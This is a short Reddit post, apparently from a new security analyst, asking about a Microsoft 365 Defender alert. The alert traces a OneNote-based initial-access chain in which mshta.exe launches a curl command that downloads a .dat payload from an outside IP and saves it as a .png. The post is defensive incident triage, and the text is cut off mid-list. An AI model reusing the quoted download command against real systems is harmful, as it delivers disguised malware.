Feb. 6, 2023, 7:12 p.m. | /u/Praezin

cybersecurity www.reddit.com

I am fairly new in my career and definitely new to MS 365 Defender. I'd ask my senior but he is off today. Ran into a situation in which a user/system triggered an alert regarding initial access.

Situation, alert in MS365 defender:
1- user opens a onenote notebook
2- onenote.exe performs suspicious LDAP query
3- curl command attempts execution via mshta.exe ("curl.exe" --output C:\\ProgramData\\aliMhW.png --url http:// IP of CSP/15581.dat)
4- mshta.exe was audited by the attack surface reduction (ASR) rule …
